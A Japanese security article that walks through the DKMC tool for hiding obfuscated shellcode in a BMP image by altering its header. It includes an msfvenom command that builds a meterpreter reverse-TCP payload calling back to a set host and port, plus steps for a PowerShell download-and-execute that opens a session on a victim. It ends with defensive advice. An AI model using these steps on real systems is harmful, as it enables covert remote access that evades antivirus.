
普通の写真は脅威になる可能性があり、情報セキュリティインシデントを解析するときに画像をダウンロードするという事実に注意を払う価値はありますか? これとDKMCツールの例を使用して、このテキストの他の質問に答えます( D on't K ill M y C at)。
ポイントは何ですか?
下の画像を見てください。
彼に奇妙な何かが見えますか?
異常なものは見当たりません。 この画像はjpeg形式でサイトにアップロードされますが、元の画像はbmp形式で保存されます。 HEXエディターでソースbmpファイルを見ると、目立った奇妙さも見られません。
ただし、このイメージには、0x00200A04に難読化されたシェルコードが含まれています。 同時に、画像に奇妙なピクセルは見られません。 実際、BMPヘッダーでは、画像の高さが人為的に削減されています。 フルサイズでは、画像は次のようになります。 右上隅に注意してください。
元の画像の高さは、悪意のある画像よりも5ピクセル高くなっていますが、人にとっては、通常これは目立ちません。
インジェクションは、ファイルが始まるファイルのタイプを示すバイト(ASCIIのBM、16進数)が42 4Dであり、アセンブラー命令に変換されたときに実行エラーが発生せず、ヘッダーのそれ以降の8バイトが画像の解釈に影響します。 したがって、これらの8バイトを任意のアセンブラー命令で埋めることができます。たとえば、イメージに格納されているシェルコードを示すjmp命令を記述することができます。 0x00200A04で。
次に、グラフィック形式で表示するのではなく、イメージに保存されているコードを何らかの方法で実行する必要があります。
たとえば、PowerShellコマンドのセットを使用できます。
私が説明したすべてのアクションはすでに自動化されており、DKMCツールにまとめられています。これについては、以下で検討します。
これは本当に機能しますか?
このツールはGitHubで利用でき、インストールは不要です。 リポジトリには、DKMCの動作の詳細を説明するプレゼンテーションがあります。
打ち上げ
python dkmc.py
いくつかのアクションが利用可能です
まず、シェルコードを作成する必要があります。 これにはmsfvenomを使用できます。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f raw > mycode
ホスト192.168.1.3、ポート4444に、バイナリ形式でバックコネクトシェルが生成されます。
次に、scメニューオプションを使用して、将来使用するためにコードをHEX形式に変換します。
次に、genコマンドを使用してシェルコードインジェクション用のBMPイメージを選択します
そして私たちは結論を得る
(generate)>>> run [+] Image size is 1000 x 700 [+] Generating obfuscation key 0x14ae6c1d [+] Shellcode size 0x14d (333) bytes [+] Adding 3 bytes of padding [+] Generating magic bytes 0x4d9d392d [+] Final shellcode length is 0x19f (415) bytes [+] New BMP header set to 0x424de9040a2000 [+] New height is 0xb7020000 (695) [+] Successfully save the image. (/root/av_bypass/DKMC/output/prettycat.bmp)
シェルコードが難読化され、最終サイズが変更され、ジャンプ命令を含むBMPヘッダーが変更され、高さが700ピクセルから695に削減されたと書かれています。
次に、psコマンドを使用して、powershellコマンドを生成し、Webサーバーからこのイメージをダウンロードして実行することができます
webコマンドを使用すると、すぐにWebサーバーを起動してこのイメージを提供できます
Wiresharkスニファーを起動し、被害者側でPowershellスクリプトを実行するとネットワーク上で何が起こるかを確認します
被害者は通常のHTTPリクエストを開始し、写真を受け取ります。私たちはmetterpreterセッションです
イメージを「通常の」方法で起動することはできないため、セキュリティ機器と技術専門家の両方がそのコンテンツに「軽く」関連付けることができます。 この例では、侵入防止システムの構成を慎重に検討し、情報セキュリティの世界のニュースをフォローし、注意を喚起することをお勧めします。